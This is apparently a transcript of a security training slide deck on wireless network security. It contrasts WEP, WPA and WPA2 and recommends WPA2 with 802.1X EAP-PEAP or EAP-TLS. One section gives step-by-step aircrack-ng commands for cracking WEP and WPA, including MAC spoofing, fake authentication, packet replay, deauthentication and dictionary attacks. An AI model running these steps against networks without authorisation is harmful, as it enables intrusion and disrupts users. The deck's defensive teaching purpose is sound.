network security and ethical hacking
DESCRIPTION
TRANSCRIPT
Network Security and Ethical Hacking - Wireless
Jason MaynardCCDA, CCIP, CCNP, GSEC, GCFWInfrastructure Architect
Network Security and Ethical Hacking - Wireless
• Is it Secure?
It really depends on the methods used to secure it.
Network Security and Ethical Hacking - Wireless
Encryption and Authentication Methods
Network Security and Ethical Hacking - Wireless
Short for Wired Equivalent Privacy, a security protocol for wireless local area networks (WLANs) defined in the 802.11b standard.
WEP
Network Security and Ethical Hacking - Wireless
WPA
Short for Wi-Fi Protected Access, a Wi-Fi standard that was designed to improve upon the security features of WEP.
Network Security and Ethical Hacking - Wireless
WPA2
Short for Wi-Fi Protected Access 2, the follow on security method to WPA for wireless networks that provides stronger data protection and network access control, Based on the IEEE 802.11i standard
Network Security and Ethical Hacking - Wireless
Mac Authentication is easy to sniff and spoof, can still get the SSID by sniffing the network
Network Security and Ethical Hacking - Wireless
Couple of demos• WEP • WPA
Network Security and Ethical Hacking - Wireless
Items Needed • USB Key with Backtrack3 (Linux distro used for ethical hacking)• DWA-642 PCMICA Card (atheros chipset and uses the madwifi-ng driver)• Access Point running WEP and then run WPA• 2 Client Laptops running Linux and Windows connecting to the AP
Network Security and Ethical Hacking - Wireless
Command Line Tools
•ifconfig•iwconfig•macchanger•airmon-ng•airdump-ng•airreplay-ng•aircrack-ng
Network Security and Ethical Hacking - Wireless
Open a couple of terminals – Type “iwconfig” identify the cards– Type “ifconfig” determine which cards are up– Type “airmon-ng stop wifi0” and “airmon-ng stop ath0” to ensure the
cards are not running in monitor mode– Type “ifconfig ath0 down” and “ifconfig wifi0 down” to ensure the
interface is down
Network Security and Ethical Hacking - Wireless
– Type “maccchanger –mac 00:11:22:33:44:55 wifi0” changes mac address – Type “airmon-ng start wifi0” put card in monitor mode – Type “airodump ath0” find AP that is running WEP or WPA then copy the SSID – stop the
scanWEP Cracking – Type “airodump –w wep.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures
packets sent to the AP)– New Terminal – Type “aireplay-ng -1 0 –a “SSID” –h “MAC in HEX” ath0” (this fakes authentication)
Network Security and Ethical Hacking - Wireless
– Go to another terminal– Type “aireplay-ng -2 –p 0841 -b “SSID” –h “MAC in HEX” ath0” (interactive packet replay)– Go to another terminal– Type “aircrack-ng wep*.cap”WPA Cracking– Type “airodump –w wpa.cap –c “channel #” –bssid “SSID in HEX” ath0” (this captures packets sent to
the AP)– Type “aireplay-ng -0 5 -a “SSID” ath0” (DEAuthentication)– Type “aircrack-ng -0 –x2 wpa*.cap –w /pentest/wireless/aircrack-ng/test/password.lst”
Network Security and Ethical Hacking - Wireless
So what do I do to protect my network and wireless users?
Network Security and Ethical Hacking - Wireless
Use WPA2 with 802.1x
Network Security and Ethical Hacking - Wireless
WPA2 provides government grade security by implementing the National Institute of Standards and Technology (NIST) FIPS 140-2 compliant AES encryption algorithm and 802.1x-based authentication
Network Security and Ethical Hacking - Wireless
802.1X provides port-based authentication, which involves communications between a supplicant, authenticator, and authentication server.
Network Security and Ethical Hacking - Wireless
802.1X – The most secure methods• EAP – PEAP• EAP – TLS
Network Security and Ethical Hacking - Wireless
EAP – PEAP• Uses Server certificates and MSCHAPv2
Network Security and Ethical Hacking - Wireless
EAP – TLS • One of the most secure methods uses client
and server certificate. More difficult to manage.
Network Security and Ethical Hacking - Wireless
Cisco 4500
Wireless LAN Solution
Cisco WLC 4400
Novell Netware 6.5 SP5
Windows 2003 Ent Server running ACS 4.0
HP Laptop802.1x (EAP-PEAP)WPA2
Cisco LWAPP gets its configuration from the WLC using LWAPP protocol.
1. Users enter their Novell Credentials to log onto the Wireless network.
2.Cisco WLC forwards the users credential to the ACS server.
3.Cisco ACS forwards the credentials to the Netware 6.5 SP 5 server or Windows 2003 Ent Server running ACS 4.0 will have Edirectory installed locally making it more secure.
4. Novell checks its directory services for the user account and validates the users credentials.
5.Users is granted access to WLAN.
SSL LDAP
SSL LDAP
CISCO AIRONET 1200 I WIRELESS ACCESS POINT
Cisco 4400 Series
WIRELESS LAN CONTROLLER
MODEL 4402 25 APCONSOLE
STATUS
ALARM
PS1
PS2
LINK ACT
SERVICE
LINK ACT
UTILITY 1 2
LINK
ACT
1
2
3
Power Supply 1 Power Supply 2
CatalystSERIES4000 GOOD
FAIL100-240 V
9 - 4 A650 W
60/50 Hz
GOOD
FAIL100-240 V
9 - 4 A650 W
60/50 Hz
MAX 15.4W/PORT
STATUS
WS-X4548-GB-RJ45V
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
MULTI-SPEEDGIGABIT ETHERNET
SWITCHING MODULE
48-PORT10/100/1000 BASE T
IN-LINE POWER
3231
3029
2827
2625
2423
2221
2019
1817
4847
4645
4443
4241
4039
3837
3635
3433
1615
1413
1211
109
87
65
43
21
32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
MAX 15.4W/PORT
STATUS
WS-X4548-GB-RJ45V
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
MULTI-SPEEDGIGABIT ETHERNET
SWITCHING MODULE
48-PORT10/100/1000 BASE T
IN-LINE POWER
3231
3029
2827
2625
2423
2221
2019
1817
4847
4645
4443
4241
4039
3837
3635
3433
1615
1413
1211
109
87
65
43
21
32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
MAX 15.4W/PORT
STATUS
WS-X4548-GB-RJ45V
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
MULTI-SPEEDGIGABIT ETHERNET
SWITCHING MODULE
48-PORT10/100/1000 BASE T
IN-LINE POWER
3231
3029
2827
2625
2423
2221
2019
1817
4847
4645
4443
4241
4039
3837
3635
3433
1615
1413
1211
109
87
65
43
21
32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
MAX 15.4W/PORT
STATUS
WS-X4548-GB-RJ45V
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
MULTI-SPEEDGIGABIT ETHERNET
SWITCHING MODULE
48-PORT10/100/1000 BASE T
IN-LINE POWER
3231
3029
2827
2625
2423
2221
2019
1817
4847
4645
4443
4241
4039
3837
3635
3433
1615
1413
1211
109
87
65
43
21
32313029282726252423222120191817 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48
Catalyst 3560 SERIES
SYST
MODE
SPEEDDUPLX
POE
STAT
RPS
1X
18X
17X
16X2X
15X 31X
32X 34X
33X 47X
48X
11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 481 2 3 4 5 6 7 8 9 10
1
PoE-48
3
2 4
Cisco LWAPP gets its configuration from the WLC using LWAPP protocol.
CISCO AIRONET 1200 I WIRELESS ACCESS POINT
Cisco 1242 LWAPP using HREAP to do local switching.
Cisco 1242 LWAPP
HP Laptop802.1x (EAP-PEAP)WPA2
Remote Sites
Mississauga
Network Security and Ethical Hacking - Wireless
• FreeRadius and OpenSSL• Microsoft Radius and Group Policy, Certificate Services• Cisco ACS server and Local Authentication/AD/NDS
Supporting Products:
Network Security and Ethical Hacking - Wireless
Support Products Links:
Backtrack• http://www.remote-exploit.org/backtrack_download.html
FreeRadius and OpenSSL• http://wiki.freeradius.org• http://www.openssl.org
Cisco ACS• http://www.cisco.com/en/US/products/sw/secursw/ps2086
Microsoft• http://www.microsoft.com/technet/security/prodtech/
windowsserver2003/pkiwire/swlan.mspx?mfr=true• http://technet.microsoft.com/en-us/magazine/cc162468.aspx
Network Security and Ethical Hacking - Wireless
Questions?